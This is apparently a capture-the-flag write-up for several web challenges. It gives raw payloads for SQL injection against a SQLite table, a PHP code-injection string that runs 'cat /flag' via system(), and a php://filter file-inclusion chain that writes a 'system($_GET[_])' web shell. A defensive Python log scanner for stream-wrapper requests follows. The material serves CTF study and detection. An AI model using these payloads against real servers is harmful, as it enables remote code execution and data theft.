WEB
SQLManager
table_name=[aaa]as select [sql][&columns[0][name]=]from sqlite_master;&columns[0][type]=2
This yields the database name and the column name:
CREATE TABLE flag_Y0U_c4nt_GUESS
(flag_ThE_C0lumn
TEXT)
table_name=[aaa]as select [flag_ThE_C0lumn][&columns[0][name]=]from flag_Y0U_c4nt_GUESS;&columns[0][type]=TEXT
Then just read the flag and we are done.
SimpleCalculator
search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat /flag
Check-in
Jigsaw puzzle
easyphp
A file inclusion can be found:
index.php?page=php://filter/read=convert.base64-encode/resource=index.php
<?php
error_reporting(0);
$page = isset($_GET['page']) ? $_GET['page'] : 'main.html';
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    header('location:index.php?page=main.html');
}
// You may want to see 7fa3b767c460b54a2be4d49030b349c7.php
?>
7fa3b767c460b54a2be4d49030b349c7.php
This is the original challenge from WMCTF 2020.
7fa3b767c460b54a2be4d49030b349c7.php?content=php://filter/write=string.strip_tags|zlib.inflate|%3F%3E%b3%b1%2f%c8%28%50%28%ae%2c%2e%49%cd%d5%50%89%77%77%0d%89%8e%8f%d5%b4%b6%b7%03%3C%3F/resource=ha1c9on.php
//?><? system($_GET[_]);
Then visit
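
On the defensive side, both easyphp requests above carry a php://filter wrapper inside a query parameter, which can be flagged from access logs. The Python sketch below is an added example, not part of the original writeup; the log lines, /save.php and out.php are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (not taken from the challenge server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=main.html HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 388',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=php%253A%252F%252Ffilter%252Fread%253Dconvert.base64-encode%252Fresource%253Dindex.php HTTP/1.1" 200 388',
    '203.0.113.5 - - [01/Jan/2024:10:00:14 +0000] "GET /save.php?content=php://filter/write=string.strip_tags|zlib.inflate/resource=out.php HTTP/1.1" 200 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
WRAPPER_RE = re.compile(r"\b(php|data|phar|zip|expect|glob|file)://", re.I)
FILTER_RE = re.compile(r"php://filter/(?:(read|write)=)?(.*?)/resource=(.*)", re.I | re.S)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so multiply-encoded wrappers are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return one finding per query parameter that contains a PHP stream wrapper."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    findings = []
    for name, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl has already decoded once
        w = WRAPPER_RE.search(value)
        if not w:
            continue
        finding = {"param": name, "wrapper": w.group(1).lower(), "mode": None, "filters": [], "resource": None}
        f = FILTER_RE.search(value)
        if f:  # php://filter: record direction, filter chain and target file
            finding["mode"] = (f.group(1) or "read+write").lower()
            finding["filters"] = f.group(2).split("|")
            finding["resource"] = f.group(3)
        findings.append(finding)
    return findings

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect_line(line))
```

A hit with mode "write" deserves the highest priority, since it means a request tried to push attacker-controlled content through a filter chain into a file on disk.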